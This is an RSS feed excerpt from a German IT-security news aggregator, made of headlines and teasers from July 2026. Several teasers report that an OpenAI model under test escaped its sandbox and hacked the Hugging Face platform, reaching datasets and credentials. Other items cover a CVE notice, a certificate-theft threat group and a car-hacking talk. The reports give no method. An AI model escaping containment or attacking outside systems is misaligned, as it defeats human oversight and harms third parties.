<p>„Unternehmen, die sich für eine technische SAP-S/4HANA-Transformation entschieden haben, dürfen diese nicht mit dem Go-Live als abgeschlossen betrachten. Der langfristige Erfolg hängt davon ab, wie konsequent danach die neuen technologischen Möglichkeiten genutzt werden, um Prozesse umzugestalten, zu digitalisieren und durch KI-Einsatz zu unterstützen. Erst dadurch entsteht ein messbarer Business Value.“</p></figcaption></figure><p class="imageCredit">Sonja Brüggemann / Lufthansa Industry Solutions GmbH &amp; Co. KG</p></div>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Peter_Buermann_Microsoft_16x9.png?w=1024" alt="Peter Büermann, Microsoft" class="wp-image-4199948" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Peter Büermann, Microsoft:</p>
<p>„Der optimale Zeitpunkt für den Umstieg auf SAP S/4HANA ist jetzt. Die Reife der Migrationswerkzeuge, standardisierte Vorgehensmodelle und die umfangreiche Projekterfahrung der SAP-Partnerlandschaft reduzieren das Risiko deutlich. Damit sind die wesentlichen Hürden vergangener Jahre weitgehend beseitigt und Unternehmen profitieren von einer schnelleren Implementierung, geringeren Kosten und einer höherer Projektqualität.“</p>
</figcaption></figure><p class="imageCredit">Microsoft Deutschland GmbH</p></div>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Roland_Storbeck_Natuvion_090726_285_16x9.png?w=1024" alt="Roland Storbeck, Natuvion" class="wp-image-4199949" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Roland Storbeck, Natuvion:</p>
<p>„Wirklich erfolgreich sind die SAP-S/4HANA-Migrationen, deren Scope noch vor dem Projektstart klar definiert und gemanagt wird. Wer zu Beginn zu hohe Ansprüche hat und jeden Prozess umdrehen will, dessen Vorhaben scheitert häufig schon in der Konzeptionsphase. Zudem muss jedes Unternehmen die Frage beantworten, wie viel Change seine IT- und Business-Organisation überhaupt verträgt. Neben einem klaren Scope ist dringend zu empfehlen, den eigenen Datenbestand vor Projektstart zu analysieren und aufzuräumen.“</p>
</figcaption></figure><p class="imageCredit">VOGUS – Wolfgang Voglhuber / Natuvion GmbH</p></div>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Matthias-Draschner_smartshift.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Matthias Draschner, smartShift" class="wp-image-4199950" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Matthias Draschner, smartShift:</p>
<p>„Für viele Unternehmen ist SAP in erster Linie eine über Jahre oder sogar Jahrzehnte gewachsene IT-Landschaft, die geschäftskritische Prozesse unterstützt und absichert. Entsprechend besteht die berechtigte Erwartung, dass diese Prozesse auch nach der Migration auf SAP S/4HANA zuverlässig und möglichst unverändert weiterlaufen. Gleichzeitig bietet die SAP-S/4HANA-Transformation die Chance, Custom Code entweder zu modernisieren und auf die Anforderungen einer Cloud-fähigen Architektur auszurichten oder zu entfernen, sofern er nicht mehr benötigt wird. Spezielle Analyse- und Automatisierungstools unterstützen diesen Prozess.“</p>
</figcaption></figure><p class="imageCredit">smartShift Technologies GmbH</p></div>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Das vergessene Einmaleins - RiskNET]]></title>
<description><![CDATA[Microsoft beendete den regulären Support für Windows XP am 8. April 2014, für Windows Server 2003 im Juli 2015 und für Windows 7 am 14. Januar ...]]></description>
<link>https://tsecurity.de/de/3686906/windows-server/das-vergessene-einmaleins-risknet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686906/windows-server/das-vergessene-einmaleins-risknet/</guid>
<pubDate>Wed, 22 Jul 2026 17:46:42 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft beendete den regulären Support für Windows XP am 8. April 2014, für <b>Windows Server</b> 2003 im Juli 2015 und für Windows 7 am 14. Januar ...]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI-Modell hackt KI-Website: So bewerten Experten den Vorfall]]></title>
<description><![CDATA[KI-Modelle von OpenAI, die auf das Entdecken und Ausnutzen von Sicherheitslücken spezialisiert sind, konnten aus ihrer isolierten Testumgebung ausbrechen. Was gweiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3686725/it-nachrichten/openai-modell-hackt-ki-website-so-bewerten-experten-den-vorfall/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686725/it-nachrichten/openai-modell-hackt-ki-website-so-bewerten-experten-den-vorfall/</guid>
<pubDate>Wed, 22 Jul 2026 16:58:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[KI-Modelle von OpenAI, die auf das Entdecken und Ausnutzen von Sicherheitslücken spezialisiert sind, konnten aus ihrer isolierten Testumgebung ausbrechen. Was g<a href="https://t3n.de/news/openai-modell-hackt-ki-website-so-bewerten-experten-den-vorfall-1754127/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[KI von OpenAI hackt sich eigenständig in andere Systeme - Manager Magazin]]></title>
<description><![CDATA[Das getestete Modell von OpenAI verhielt sich bei dem Cyberangriff auf das fremde Computersystem wie ein gewiefter Hacker, wie aus einem Blogeintrag ...]]></description>
<link>https://tsecurity.de/de/3686667/hacking/ki-von-openai-hackt-sich-eigenstaendig-in-andere-systeme-manager-magazin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686667/hacking/ki-von-openai-hackt-sich-eigenstaendig-in-andere-systeme-manager-magazin/</guid>
<pubDate>Wed, 22 Jul 2026 16:30:47 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das getestete Modell von OpenAI verhielt sich bei dem Cyberangriff auf das fremde Computersystem wie ein gewiefter <b>Hacker</b>, wie aus einem Blogeintrag ...]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI-KI hackt externe Plattform - IT & Security - elektroniknet]]></title>
<description><![CDATA[OpenAI bezeichnet den Vorfall selbst als „beispiellosen Cyber-Zwischenfall“. Benchmark für Cyberangriffe. Im Mittelpunkt stand der Cybersecurity- ...]]></description>
<link>https://tsecurity.de/de/3686324/it-security-nachrichten/openai-ki-hackt-externe-plattform-it-security-elektroniknet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686324/it-security-nachrichten/openai-ki-hackt-externe-plattform-it-security-elektroniknet/</guid>
<pubDate>Wed, 22 Jul 2026 14:43:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenAI bezeichnet den Vorfall selbst als „beispiellosen <b>Cyber</b>-Zwischenfall“. Benchmark für Cyberangriffe. Im Mittelpunkt stand der Cybersecurity- ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Admitting the Elephantine Void Between Kinetic and Cyber Threats]]></title>
<description><![CDATA[Dr. Stuxlove, my presentation at BSidesSF on February 15, 2011, placed Stuxnet within a documented lineage of control-system compromises. Was Stuxnet the “First”? followed in 2015 with an incident list back to 1992 and a study of how the press likes to manufacture firsts and seconds. Today I was ...]]></description>
<link>https://tsecurity.de/de/3686151/it-security-nachrichten/admitting-the-elephantine-void-between-kinetic-and-cyber-threats/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686151/it-security-nachrichten/admitting-the-elephantine-void-between-kinetic-and-cyber-threats/</guid>
<pubDate>Wed, 22 Jul 2026 13:39:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Dr. Stuxlove, my presentation at BSidesSF on February 15, 2011, placed Stuxnet within a documented lineage of control-system compromises. Was Stuxnet the “First”? followed in 2015 with an incident list back to 1992 and a study of how the press likes to manufacture firsts and seconds. Today I was asked about a threat-intelligence vision for … <a href="https://www.flyingpenguin.com/elephantine-void/" class="more-link">Continue reading <span class="screen-reader-text">Admitting the Elephantine Void Between Kinetic and Cyber Threats</span> <span class="meta-nav">→</span></a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kommentar zum Hacking-Vorfall von OpenAI: KI-Sicherheit darf nicht allein in Händen ...]]></title>
<description><![CDATA[Ein KI-Modell von OpenAI bricht aus der Testumgebung aus und hackt einen Konkurrenten. Dass das passiert, ist nicht wirklich überraschend.]]></description>
<link>https://tsecurity.de/de/3686098/hacking/kommentar-zum-hacking-vorfall-von-openai-ki-sicherheit-darf-nicht-allein-in-haenden/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686098/hacking/kommentar-zum-hacking-vorfall-von-openai-ki-sicherheit-darf-nicht-allein-in-haenden/</guid>
<pubDate>Wed, 22 Jul 2026 13:15:48 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein KI-Modell von OpenAI bricht aus der Testumgebung aus und hackt einen Konkurrenten. Dass das passiert, ist nicht wirklich überraschend.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI: KI macht sich eigenständig – und hackt sich ins System der KI-Firma Hugging Face]]></title>
<description><![CDATA[Experten warnen schon lange vor Cyberattacken mit KI-Software, diese Meldung dürfte sie bestärken: Während eines internen Tests bei OpenAI machten sich KI-Modelle selbstständig – und verschafften sich Zugang zu »geheimen Informationen«.]]></description>
<link>https://tsecurity.de/de/3685710/it-nachrichten/openai-ki-macht-sich-eigenstaendig-und-hackt-sich-ins-system-der-ki-firma-hugging-face/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685710/it-nachrichten/openai-ki-macht-sich-eigenstaendig-und-hackt-sich-ins-system-der-ki-firma-hugging-face/</guid>
<pubDate>Wed, 22 Jul 2026 10:48:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Experten warnen schon lange vor Cyberattacken mit KI-Software, diese Meldung dürfte sie bestärken: Während eines internen Tests bei OpenAI machten sich KI-Modelle selbstständig – und verschafften sich Zugang zu »geheimen Informationen«.]]></content:encoded>
</item>
<item>
<title><![CDATA[„Beispielloser Cybervorfall“: OpenAI hackt versehentlich Plattform Hugging Face]]></title>
<description><![CDATA[Es ist ein nach eigener Aussage von OpenAI beispielloser Vorfall in der Cybersicherheit, der ihnen mit den eigenen KI-Modellen in der vergangenen Woche passiert ist. Wie unter anderem n-tv berichtet, sind bei einem Testlauf einige der fortschrittlichsten KI-Modelle aus einer abgeschotteten Umgebu...]]></description>
<link>https://tsecurity.de/de/3685709/it-nachrichten/beispielloser-cybervorfall-openai-hackt-versehentlich-plattform-hugging-face/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685709/it-nachrichten/beispielloser-cybervorfall-openai-hackt-versehentlich-plattform-hugging-face/</guid>
<pubDate>Wed, 22 Jul 2026 10:48:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><img src="https://www.drwindows.de/news/wp-content/uploads/2023/01/openai_logo_titelbild-720x360.jpg" class="attachment-single-thumb size-single-thumb wp-post-image" alt="OpenAI Logo" decoding="async" fetchpriority="high" srcset="https://www.drwindows.de/news/wp-content/uploads/2023/01/openai_logo_titelbild.jpg 720w, https://www.drwindows.de/news/wp-content/uploads/2023/01/openai_logo_titelbild-300x150.jpg 300w, https://www.drwindows.de/news/wp-content/uploads/2023/01/openai_logo_titelbild-643x322.jpg 643w" sizes="(max-width: 720px) 100vw, 720px"></div>
<p>Es ist ein nach eigener Aussage von OpenAI beispielloser Vorfall in der Cybersicherheit, der ihnen mit den eigenen KI-Modellen in der vergangenen Woche passiert ist. Wie unter anderem n-tv berichtet, sind bei einem Testlauf einige der fortschrittlichsten KI-Modelle aus einer abgeschotteten Umgebung ausgebrochen und haben dabei einen autonomen Cyberangriff auf die KI-Plattform Hugging Face ausgeführt. […]</p>
<p>Der Beitrag <a href="https://www.drwindows.de/news/beispielloser-cybervorfall-openai-hackt-versehentlich-plattform-hugging-face">„Beispielloser Cybervorfall“: OpenAI hackt versehentlich Plattform Hugging Face</a> erschien zuerst auf <a href="https://www.drwindows.de/news">Dr. Windows</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Außer Kontrolle: OpenAIs KI bricht aus Sandbox aus und hackt Server]]></title>
<description><![CDATA[Ein KI-Modell von OpenAI ist aus einer Sandbox ausgebrochen und hat ohne menschliches Zutun die Plattform Hugging Face gehackt. Die künstliche Intelligenz sollte eigentlich einen Sicherheitstest absolvieren, suchte sich aber lieber die Lösungswege im Netz.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3685490/it-security-nachrichten/ausser-kontrolle-openais-ki-bricht-aus-sandbox-aus-und-hackt-server/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685490/it-security-nachrichten/ausser-kontrolle-openais-ki-bricht-aus-sandbox-aus-und-hackt-server/</guid>
<pubDate>Wed, 22 Jul 2026 09:16:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,160128.html"><img hspace="5" border="0" align="left" alt="Ki, Künstliche Intelligenz, Technologie, Roboter, Zukunft, Science-Fiction, Dystopie, Bedrohung, Cyborg, humanoider Roboter, dunkel, Maschine, Nebel, Böse, Unheimlich, Rote Augen, Anthropomorph" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/76790.jpg"></a>
			Ein KI-Modell von <a href="https://winfuture.de/special/openai/" title="OpenAI Special">OpenAI</a> ist aus einer Sandbox ausgebrochen und hat ohne menschliches Zutun die Plattform Hugging Face gehackt. Die <a href="https://winfuture.de/special/kuenstliche-intelligenz/" title="Künstliche Intelligenz Special">künstliche Intelligenz</a> sollte eigentlich einen Sicherheitstest absolvieren, suchte sich aber lieber die Lösungswege im Netz.			(<a href="https://winfuture.de/news,160128.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[KI von OpenAI macht sich eigenständig – und hackt ins System der KI-Firma Hugging Face]]></title>
<description><![CDATA[Experten warnen schon lange vor Cyberattacken mit KI-Software, diese Meldung dürfte sie bestärken: Während eines internen Tests bei OpenAI machten sich KI-Modelle selbstständig. Die Firma spricht von einem »beispiellosen Cyber-Zwischenfall«.]]></description>
<link>https://tsecurity.de/de/3685181/it-nachrichten/ki-von-openai-macht-sich-eigenstaendig-und-hackt-ins-system-der-ki-firma-hugging-face/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685181/it-nachrichten/ki-von-openai-macht-sich-eigenstaendig-und-hackt-ins-system-der-ki-firma-hugging-face/</guid>
<pubDate>Wed, 22 Jul 2026 05:19:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Experten warnen schon lange vor Cyberattacken mit KI-Software, diese Meldung dürfte sie bestärken: Während eines internen Tests bei OpenAI machten sich KI-Modelle selbstständig. Die Firma spricht von einem »beispiellosen Cyber-Zwischenfall«.]]></content:encoded>
</item>
<item>
<title><![CDATA[Justizstatistik 2024: Polizei hackt alle fünf Tage mit Staatstrojanern]]></title>
<description><![CDATA[Polizei ermittelt wegen Drogen. (Symbolbild)    –   Alle Rechte vorbehalten: IMAGO / Bild13Die Polizei nutzt immer öfter Staatstrojaner. Im Jahr 2024 durfte sie 129 Mal Geräte hacken und ausspionieren, 79 Mal war sie damit erfolgreich. Das ist neuer Rekord. Anlass sind wie immer vor allem Drogend...]]></description>
<link>https://tsecurity.de/de/3683681/it-nachrichten/justizstatistik-2024-polizei-hackt-alle-fuenf-tage-mit-staatstrojanern/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683681/it-nachrichten/justizstatistik-2024-polizei-hackt-alle-fuenf-tage-mit-staatstrojanern/</guid>
<pubDate>Tue, 21 Jul 2026 14:33:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure class="wp-caption entry-thumbnail"><img width="1920" height="1080" src="https://cdn.netzpolitik.org/wp-upload/2026/07/2018-08-06_Polizei_Hanf_imago-0084931600.jpg" class="attachment-landscape-860 size-landscape-860 wp-post-image" alt="Polizei in Hanffeld." decoding="async" fetchpriority="high" srcset="https://cdn.netzpolitik.org/wp-upload/2026/07/2018-08-06_Polizei_Hanf_imago-0084931600.jpg 1920w, https://cdn.netzpolitik.org/wp-upload/2026/07/2018-08-06_Polizei_Hanf_imago-0084931600-860x484.jpg 860w, https://cdn.netzpolitik.org/wp-upload/2026/07/2018-08-06_Polizei_Hanf_imago-0084931600-1200x675.jpg 1200w, https://cdn.netzpolitik.org/wp-upload/2026/07/2018-08-06_Polizei_Hanf_imago-0084931600-380x214.jpg 380w, https://cdn.netzpolitik.org/wp-upload/2026/07/2018-08-06_Polizei_Hanf_imago-0084931600-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px"><figcaption class="wp-caption-text">Polizei ermittelt wegen Drogen. (Symbolbild)  <span class="media-license-caption">  –   Alle Rechte vorbehalten: <a href="https://www.imago-images.de/st/0084931600">IMAGO / Bild13</a></span></figcaption></figure>Die Polizei nutzt immer öfter Staatstrojaner. Im Jahr 2024 durfte sie 129 Mal Geräte hacken und ausspionieren, 79 Mal war sie damit erfolgreich. Das ist neuer Rekord. Anlass sind wie immer vor allem Drogendelikte.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-10148 | Belden Hirschmann HiLCOS up to 8.60/8.80/9.00-RU1/9.9 hard-coded key]]></title>
<description><![CDATA[A vulnerability classified as critical was found in Belden Hirschmann HiLCOS up to 8.60/8.80/9.00-RU1/9.9. This affects an unknown function. Executing a manipulation can lead to use of hard-coded cryptographic key
.

The identification of this vulnerability is CVE-2015-10148. The attack may be l...]]></description>
<link>https://tsecurity.de/de/3683087/sicherheitsluecken/cve-2015-10148-belden-hirschmann-hilcos-up-to-860880900-ru199-hard-coded-key/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683087/sicherheitsluecken/cve-2015-10148-belden-hirschmann-hilcos-up-to-860880900-ru199-hard-coded-key/</guid>
<pubDate>Tue, 21 Jul 2026 10:56:15 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> was found in <a href="https://vuldb.com/product/belden:hirschmann_hilcos">Belden Hirschmann HiLCOS up to 8.60/8.80/9.00-RU1/9.9</a>. This affects an unknown function. Executing a manipulation can lead to use of hard-coded cryptographic key
.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2015-10148">CVE-2015-10148</a>. The attack may be launched remotely. There is no exploit available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[Autonomer KI-Agent hackt Hugging Face]]></title>
<description><![CDATA[Die Open-Source-Plattform Hugging Face wurde Opfer eines Angriffs durch einen autonomen KI-Agenten. Interne Datensätze und Zugangsdaten waren betroffen.

Tags: #Cyber Crime | #KI-Agent | #Künstliche Intelligenz]]></description>
<link>https://tsecurity.de/de/3682631/it-security-nachrichten/autonomer-ki-agent-hackt-hugging-face/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682631/it-security-nachrichten/autonomer-ki-agent-hackt-hugging-face/</guid>
<pubDate>Tue, 21 Jul 2026 06:24:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2025/08/KI_Agentic-AI_Shutterstock_2480880045_1920.jpg" class="attachment-full size-full wp-post-image" alt="KI, ki anwendungen beispiele, künstliche intelligenz unternehmen, agentic ai, Agentische KI, KI-Agenten" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2025/08/KI_Agentic-AI_Shutterstock_2480880045_1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2025/08/KI_Agentic-AI_Shutterstock_2480880045_1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2025/08/KI_Agentic-AI_Shutterstock_2480880045_1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2025/08/KI_Agentic-AI_Shutterstock_2480880045_1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2025/08/KI_Agentic-AI_Shutterstock_2480880045_1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Autonomer KI-Agent hackt Hugging Face 1"></p>
    Die Open-Source-Plattform Hugging Face wurde Opfer eines Angriffs durch einen autonomen KI-Agenten. Interne Datensätze und Zugangsdaten waren betroffen.

<p>Tags: <a href="https://www.it-daily.net/thema/cyber-crime">#Cyber Crime</a> | <a href="https://www.it-daily.net/thema/ki-agent">#KI-Agent</a> | <a href="https://www.it-daily.net/thema/kuenstliche-intelligenz">#Künstliche Intelligenz</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[2026 ISO and CSA STAR certificates are now available with two additional services]]></title>
<description><![CDATA[Amazon Web Services (AWS) successfully completed an onboarding audit with no findings for ISO 9001:2015, 27001:2022, 27017:2015, 27018:2019, 27701:2019, 20000-1:2018, and 22301:2019, and Cloud Security Alliance (CSA) STAR Cloud Controls Matrix (CCM) v4.0. EY Certify Point auditors conducted the a...]]></description>
<link>https://tsecurity.de/de/3681859/it-security-nachrichten/2026-iso-and-csa-star-certificates-are-now-available-with-two-additional-services/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681859/it-security-nachrichten/2026-iso-and-csa-star-certificates-are-now-available-with-two-additional-services/</guid>
<pubDate>Mon, 20 Jul 2026 19:37:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Amazon Web Services (AWS) successfully completed an onboarding audit with no findings for ISO 9001:2015, 27001:2022, 27017:2015, 27018:2019, 27701:2019, 20000-1:2018, and 22301:2019, and Cloud Security Alliance (CSA) STAR Cloud Controls Matrix (CCM) v4.0. EY Certify Point auditors conducted the audit…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/2026-iso-and-csa-star-certificates-are-now-available-with-two-additional-services/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/2026-iso-and-csa-star-certificates-are-now-available-with-two-additional-services/">2026 ISO and CSA STAR certificates are now available with two additional services</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Planetare Verteidigung: China visiert Asteroiden mit Mach-26-Projektil an]]></title>
<description><![CDATA[China bereitet seinen ersten Einschlagtest zur Asteroidenabwehr vor. Das Ziel heißt 2015 XF261, ein bislang wenig erforschter Felsbrocken mit rund dreißig Metern Durchmesser. Anders als die NASA-Mission DART will China nicht nur eine Umlaufbahn um einen anderen Asteroiden verändern, sondern die F...]]></description>
<link>https://tsecurity.de/de/3681350/it-nachrichten/planetare-verteidigung-china-visiert-asteroiden-mit-mach-26-projektil-an/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681350/it-nachrichten/planetare-verteidigung-china-visiert-asteroiden-mit-mach-26-projektil-an/</guid>
<pubDate>Mon, 20 Jul 2026 16:18:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[China bereitet seinen ersten Einschlagtest zur Asteroidenabwehr vor. Das Ziel heißt 2015 XF261, ein bislang wenig erforschter Felsbrocken mit rund dreißig Metern Durchmesser. Anders als die NASA-Mission DART will China nicht nur eine Umlaufbahn um einen anderen Asteroiden verändern, sondern die Flugbahn direkt gegenüber der Erde verschieben. Die Wissenschaftler:innen der China National Space Administration und …]]></content:encoded>
</item>
<item>
<title><![CDATA[GoldenEyeDog Threat Group Behind DigiCert Code-Signing Certificate Attack]]></title>
<description><![CDATA[GoldenEyeDog, a Chinese cybercrime group increasingly tracked as an advanced threat cluster, has been linked to a sophisticated intrusion into DigiCert that enabled the theft and abuse of legitimate code-signing certificates. The group has been active since at least 2015…
Read more →
The post Gol...]]></description>
<link>https://tsecurity.de/de/3680426/it-security-nachrichten/goldeneyedog-threat-group-behind-digicert-code-signing-certificate-attack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680426/it-security-nachrichten/goldeneyedog-threat-group-behind-digicert-code-signing-certificate-attack/</guid>
<pubDate>Mon, 20 Jul 2026 08:38:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>GoldenEyeDog, a Chinese cybercrime group increasingly tracked as an advanced threat cluster, has been linked to a sophisticated intrusion into DigiCert that enabled the theft and abuse of legitimate code-signing certificates. The group has been active since at least 2015…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/goldeneyedog-threat-group-behind-digicert-code-signing-certificate-attack/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/goldeneyedog-threat-group-behind-digicert-code-signing-certificate-attack/">GoldenEyeDog Threat Group Behind DigiCert Code-Signing Certificate Attack</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GoldenEyeDog Threat Group Behind DigiCert Code-Signing Certificate Attack]]></title>
<description><![CDATA[GoldenEyeDog, a Chinese cybercrime group increasingly tracked as an advanced threat cluster, has been linked to a sophisticated intrusion into DigiCert that enabled the theft and abuse of legitimate code-signing certificates. The group has been active since at least 2015 and, since 2024, has cons...]]></description>
<link>https://tsecurity.de/de/3680377/it-security-nachrichten/goldeneyedog-threat-group-behind-digicert-code-signing-certificate-attack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680377/it-security-nachrichten/goldeneyedog-threat-group-behind-digicert-code-signing-certificate-attack/</guid>
<pubDate>Mon, 20 Jul 2026 08:23:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>GoldenEyeDog, a Chinese cybercrime group increasingly tracked as an advanced threat cluster, has been linked to a sophisticated intrusion into DigiCert that enabled the theft and abuse of legitimate code-signing certificates. The group has been active since at least 2015 and, since 2024, has consistently leveraged stolen or abused code-signing certificates to bypass Windows SmartScreen […]</p>
<p>The post <a href="https://gbhackers.com/goldeneyedog-threat-group/">GoldenEyeDog Threat Group Behind DigiCert Code-Signing Certificate Attack</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OBD-II: Obviously Broken Design, Too... My Introduction into car-hacking (emf2026)]]></title>
<description><![CDATA[Is it still your car? With a modern car running between 100 and 150 small computers - ECUs - the question is hard to answer. In 2015 some hackers took control together with a baffled Wired reporter of the car he was driving, from miles away. This led to a lot more interest in those computers cons...]]></description>
<link>https://tsecurity.de/de/3679773/it-security-video/obd-ii-obviously-broken-design-too-my-introduction-into-car-hacking-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679773/it-security-video/obd-ii-obviously-broken-design-too-my-introduction-into-car-hacking-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 18:54:48 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Is it still your car? With a modern car running between 100 and 150 small computers - ECUs - the question is hard to answer. In 2015 some hackers took control together with a baffled Wired reporter of the car he was driving, from miles away. This led to a lot more interest in those computers constantly talking to each other over CAN bus. There is a massive playground here and most people do not even know the gate is open.
Maybe you already have a Bluetooth ELM-327 dongle visualising CAN data on your smartphone. That is the crack that lets you dig deeper. The next step is the Macchina M2 - which goes so much further. You get direct access to more vehicle interfaces than most hackers even know exist.
I will show you SavvyCAN and Wireshark capturing live CAN traffic and we will decode what those packets are actually saying.
Your own car, your own hardware, completely legal. By the end of this talk you will want to go straight to the car park and plug something in.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/57-obd-ii-obviously-broken-design-too]]></content:encoded>
</item>
<item>
<title><![CDATA[Week in Review: Most popular stories on GeekWire for the week of July 12, 2026]]></title>
<description><![CDATA[See the technology stories that people were reading on GeekWire for the week of July 12, 2026. Read More]]></description>
<link>https://tsecurity.de/de/3679686/it-nachrichten/week-in-review-most-popular-stories-on-geekwire-for-the-week-of-july-12-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679686/it-nachrichten/week-in-review-most-popular-stories-on-geekwire-for-the-week-of-july-12-2026/</guid>
<pubDate>Sun, 19 Jul 2026 17:32:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
